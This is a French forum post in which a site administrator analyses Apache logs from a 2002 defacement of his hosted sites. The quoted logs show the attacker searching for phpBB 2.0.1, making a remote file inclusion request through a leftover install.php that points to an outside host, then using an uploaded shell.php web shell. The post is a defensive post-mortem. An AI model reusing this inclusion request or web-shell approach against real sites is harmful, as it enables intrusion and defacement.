Bonjour à tous.
En ce jour sombre, c'est ce matin que j'ai découvert un hack de tous les sites qui sont hébergés ici. Herueusement rien de grave, juste les index.php ont été remplacés.
Seulement voilà, il fallait trouver la faille qui a permis au méchant vilain pas beau de nous faire du tort.
Voici donc le cours d'analyse de logs apache par Axel:
200.163.8.140 - - [20/Dec/2002:01:33:48 +0100] "GET / HTTP/1.1" 200 6572 forums.axelgamecenter.com "http://www.alltheweb.com/search?q=%22powered+by+phpbb+2.0.1%22&c=web&cs=utf-8&o=930&l=any" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
1. Notre hackeur a fait des recherches sur "Powered by phpBB 2.0.1" Il cherchait donc volontairement à hacker par le forum: phpBB doit souffrir d'une faille de sécurité importante. Je vais tâcher de la corriger le plus vite possible avec l'aide d'aevoc.
200.163.8.140 - - [20/Dec/2002:01:34:01 +0100] "GET /install.php?phpbb_root_dir=http://www.superwroger.hpg.ig.com.br/ HTTP/1.1" 200 1266 forums.axelgamecenter.com "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
207.253.45.194 - - [20/Dec/2002:01:34:45 +0100] "GET / HTTP/1.1" 200 683 www.mahorosan.net "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
2. Là notre ami "installe" un nouveau phpBB dans notre forum en se servant du sien sur sa bécane comme source (corrompue).
De toutes évidence à partir de ce moment là on peut dire que la faute me revient, ce fichier install.php aurait dû être effacé. Ca n'a pas été fait. J'en assume les conséquences.
200.163.8.140 - - [20/Dec/2002:01:36:01 +0100] "GET /shell.php HTTP/1.1" 200 13127 forums.axelgamecenter.com "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
200.163.8.140 - - [20/Dec/2002:01:36:06 +0100] "POST /shell.php HTTP/1.1" 200 13605 forums.axelgamecenter.com "http://forums.axelgamecenter.com/shell.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
3. Et c'est là qu'il a commencé à faire le batard en uploadant un script php qui lui a permis d'envoyer n'importe quelle commande UNIX au serveur web, à savoir déplacer, renommer, supprimer, copier des fichiers etc.
Ingénieux, non?
En tous cas c'est une belle leçon de sécurité pour moi
